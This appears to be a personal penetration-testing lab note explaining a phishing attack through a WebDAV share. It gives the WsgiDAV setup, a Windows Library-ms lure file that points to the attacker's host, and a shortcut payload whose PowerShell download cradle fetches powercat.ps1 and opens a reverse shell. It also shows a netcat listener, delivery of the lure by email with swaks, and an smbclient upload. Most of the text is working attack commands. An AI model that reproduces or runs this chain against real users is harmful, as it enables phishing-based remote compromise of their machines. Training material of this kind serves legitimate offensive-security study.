wsgidav - wook413

- If the exploit doesn't work properly, `<url>http://192.168.45.173</url>` just the IP. WebDAV on Windows will work best on port 80 # Phishing Attack ```bash # Install pip3 install wsgidav # create webDAV root directory mkdir webdav # start WsgiDAV on port 80 /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=8000 --auth=anonymous --root /home/kali/Desktop/webdav # venv로 설치했을 경우 /home/kali/Desktop/venv/bin/wsgidav --host=0.0.0.0 --port=8000 --auth=anonymous --root /home/kali/Desktop/webdav # Confirm by opening http://127.0.0.1 ``` ![[Pasted image 20251207211234.png]] ```bash # vscode or notepad # 'config.Library-ms' # Make the IP Address point to my Kali # Save the file and transfer it to /home/kali/Desktop <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://192.168.119.5</url> # point to our WebDAV share over HTTP </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> ``` ```bash # prepare the Windows Library and shortcut files with VS Code # we can also use Notepad # Create a test file named 'config.Library-ms' # Make the IP Address point to my Kali # Save the file and transfer it to /home/kali/Desktop <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://192.168.45.173:8000</url> # point to our WebDAV share over HTTP </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> ``` Save and close the file in VS Code and double click the `config.Library-ms` file on the Desktop. We see the `test.txt` file we had created ![[Pasted image 20251207212049.png]] When re-open our file in VS Code, we find that a new tag appeared named `serialized`. The tag contains base64-encoded info about the location of the url tag. Additionally, the content inside the `url` tags has changed from `http://192.168.45.173:8000` to `\\192.168.45.173@8000\DavWWWRoot`. Due to the encoded information in the *serialized* tag, it may not be working on other machines or after a restart. To avoid running into any issues when performing this attack, we can reset the file to its original state by pasting the contents of the code into VS Code. ![[Pasted image 20251207212216.png]] ##### Now create a shortcut file - Create the shortcut file - Right-click on the Desktop select `New` > `Shortcut`. (Windows) - A victim double-clicking the shortcut file will download `PowerCat` and create a reverse shell. ![[Pasted image 20251207212839.png]] - Instead of using a Python3 web server to server `Powercat` we could also host it on the `WebDAV` share. However, as our WebDAV share is writable, AV and other security solutions could remove or quarantine our payload. ```bash powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1'); powercat -c 192.168.45.173 -p 4444 -e powershell" # Once we enter the command install as shortcut file name, we can transfer the resulting shortcut file to our Kali machine into the WebDAV directory. # Next Step is to server PowerCat via a Python3 web server. cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 . python3 -m http.server 8000 # Set up a netcat listener rlwrap nc -lvnp 4444 # Create the email with swaks # Create the body of the email containing our pretext. sudo swaks --to [email protected] --to [email protected] --from [email protected] --attach @config.Library-ms --server $IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap ``` ##### Transfer *automatic_configuration.lnk* and *config.Library-ms* ```bash cd webdav smbclient //192.168.245.194/share -c 'put config.Library-ms' ```